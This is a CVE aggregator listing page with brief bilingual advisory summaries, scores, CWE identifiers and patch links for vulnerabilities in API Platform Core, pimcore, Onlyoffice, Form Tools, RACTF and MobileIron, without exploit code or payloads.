CVSS: 4.4EPSS: 0%CPEs: 1EXPL: 0CVE-2025-23204 – GraphQl securityAfterResolver not called
https://notcve.org/view.php?id=CVE-2025-23204
24 Mar 2025 — API Platform Core is a system to create hypermedia-driven REST and GraphQL APIs. Starting in version 3.3.8, a security check that gets called after GraphQl resolvers is always replaced by another one as there's no break in a clause. As this falls back to `security`, the impact is there only when there's only a security after resolver and none inside security. Version 3.3.15 contains a patch for the issue. • https://github.com/api-platform/core/commit/dc4fc84ba93e22b4f44a37e90a93c6d079c1c620 • CWE-20: Improper Input Validation •
CVSS: 6.5EPSS: 0%CPEs: 1EXPL: 1CVE-2023-5192 – Excessive Data Query Operations in a Large Data Table in pimcore/demo
https://notcve.org/view.php?id=CVE-2023-5192
26 Sep 2023 — Excessive Data Query Operations in a Large Data Table in GitHub repository pimcore/demo prior to 10.3.0. Operaciones excesivas de consulta de datos en una tabla de datos grande en el repositorio de GitHub pimcore/demo antes de 10.3.0. • https://github.com/pimcore/demo/commit/a2a7ff3b565882aefb759804aac4a51afb458f1f • CWE-1049: Excessive Data Query Operations in a Large Data Table •
CVSS: 7.7EPSS: 0%CPEs: 3EXPL: 0CVE-2023-25575 – Secured properties in API Platform Core may be accessible within collections
https://notcve.org/view.php?id=CVE-2023-25575
28 Feb 2023 — API Platform Core is the server component of API Platform: hypermedia and GraphQL APIs. Resource properties secured with the `security` option of the `ApiPlatform\Metadata\ApiProperty` attribute can be disclosed to unauthorized users. The problem affects most serialization formats, including raw JSON, which is enabled by default when installing API Platform. Custom serialization formats may also be impacted. Only collection endpoints are affected by the issue, item endpoints are not. • https://github.com/api-platform/core/commit/5723d68369722feefeb11e42528d9580db5dd0fb • CWE-842: Placement of User into Incorrect Group CWE-863: Incorrect Authorization •
CVSS: 9.8EPSS: 15%CPEs: 2EXPL: 1CVE-2022-29777
https://notcve.org/view.php?id=CVE-2022-29777
01 Jun 2022 — Onlyoffice Document Server v6.0.0 and below and Core 6.1.0.26 and below were discovered to contain a heap overflow via the component DesktopEditor/fontengine/fontconverter/FontFileBase.h. Se ha detectado que Onlyoffice Document Server versiones v6.0.0 y anteriores y Core versiones 6.1.0.26 y anteriores, contienen un desbordamiento de pila por medio del componente DesktopEditor/fontengine/fontconverter/FontFileBase.h • https://github.com/ONLYOFFICE/DocumentServer/blob/master/CHANGELOG.md#601 • CWE-787: Out-of-bounds Write •
CVSS: 9.8EPSS: 15%CPEs: 2EXPL: 1CVE-2022-29776
https://notcve.org/view.php?id=CVE-2022-29776
01 Jun 2022 — Onlyoffice Document Server v6.0.0 and below and Core 6.1.0.26 and below were discovered to contain a stack overflow via the component DesktopEditor/common/File.cpp. Se ha detectado que Onlyoffice Document Server versiones v6.0.0 y anteriores y Core versiones 6.1.0.26 y anteriores, contenían un desbordamiento de pila por medio del componente DesktopEditor/common/File.cpp • https://github.com/ONLYOFFICE/DocumentServer/blob/master/CHANGELOG.md#601 • CWE-787: Out-of-bounds Write •
CVSS: 5.4EPSS: 0%CPEs: 1EXPL: 2CVE-2021-38144
https://notcve.org/view.php?id=CVE-2021-38144
31 Aug 2021 — An issue was discovered in Form Tools through 3.0.20. A low-privileged user can trigger Reflected XSS when a viewing a form via the submission_id parameter, e.g., clients/forms/edit_submission.php?form_id=1&view_id=1&submission_id=[XSS]. Se ha detectado un problema en Form Tools versiones hasta 3.0.20. Un usuario poco privilegiado puede desencadenar un ataque de tipo XSS Reflejado cuando visualiza un formulario por medio del parámetro submission_id, por ejemplo, clients/forms/edit_submission.php? • https://bernardofsr.github.io/blog/2021/form-tools • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') •
CVSS: 6.1EPSS: 1%CPEs: 1EXPL: 2CVE-2021-38143
https://notcve.org/view.php?id=CVE-2021-38143
31 Aug 2021 — An issue was discovered in Form Tools through 3.0.20. When an administrator creates a customer account, it is possible for the customer to log in and proceed with a change of name and last name. However, these fields are vulnerable to XSS payload insertion, being triggered in the admin panel when the admin tries to see the client list. This type of XSS (stored) can lead to the extraction of the PHPSESSID cookie belonging to the admin. Se ha detectado un problema en Form Tools versiones hasta 3.0.20. • https://bernardofsr.github.io/blog/2021/form-tools • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') •
CVSS: 9.8EPSS: 2%CPEs: 1EXPL: 2CVE-2021-38145
https://notcve.org/view.php?id=CVE-2021-38145
31 Aug 2021 — An issue was discovered in Form Tools through 3.0.20. SQL Injection can occur via the export_group_id field when a low-privileged user (client) tries to export a form with data, e.g., manipulation of modules/export_manager/export.php?export_group_id=1&export_group_1_results=all&export_type_id=1. Se ha detectado un problema en Form Tools versiones hasta 3.0.20. Puede producirse una inyección SQL por medio del campo export_group_id cuando un usuario poco privilegiado (cliente) intenta exportar un formulario c... • https://bernardofsr.github.io/blog/2021/form-tools • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') •
CVSS: 7.5EPSS: 0%CPEs: 1EXPL: 0CVE-2020-15235 – Sensitive data exposure in RACTF
https://notcve.org/view.php?id=CVE-2020-15235
05 Oct 2020 — In RACTF before commit f3dc89b, unauthenticated users are able to get the value of sensitive config keys that would normally be hidden to everyone except admins. All versions after commit f3dc89b9f6ab1544a289b3efc06699b13d63e0bd(3/10/20) are patched. En RACTF versiones anteriores al commit f3dc89b, los usuarios no autenticados pueden ser capaces de obtener el valor de las claves de configuración confidenciales que normalmente estarían ocultas para todos excepto para los administradores. Todas las versi... • https://github.com/ractf/core/commit/f3dc89b9f6ab1544a289b3efc06699b13d63e0bd • CWE-200: Exposure of Sensitive Information to an Unauthorized Actor •
CVSS: 9.8EPSS: 94%CPEs: 13EXPL: 3CVE-2020-15505 – Ivanti MobileIron Multiple Products Remote Code Execution Vulnerability
https://notcve.org/view.php?id=CVE-2020-15505
07 Jul 2020 — A remote code execution vulnerability in MobileIron Core & Connector versions 10.3.0.3 and earlier, 10.4.0.0, 10.4.0.1, 10.4.0.2, 10.4.0.3, 10.5.1.0, 10.5.2.0 and 10.6.0.0; and Sentry versions 9.7.2 and earlier, and 9.8.0; and Monitor and Reporting Database (RDB) version 2.0.0.1 and earlier that allows remote attackers to execute arbitrary code via unspecified vectors. Se presenta una vulnerabilidad de ejecución de código remoto en las versiones 10.3.0.3 y anteriores del MobileIron Core y Connector, version... • https://packetstorm.news/files/id/161097 • CWE-706: Use of Incorrectly-Resolved Name or Reference •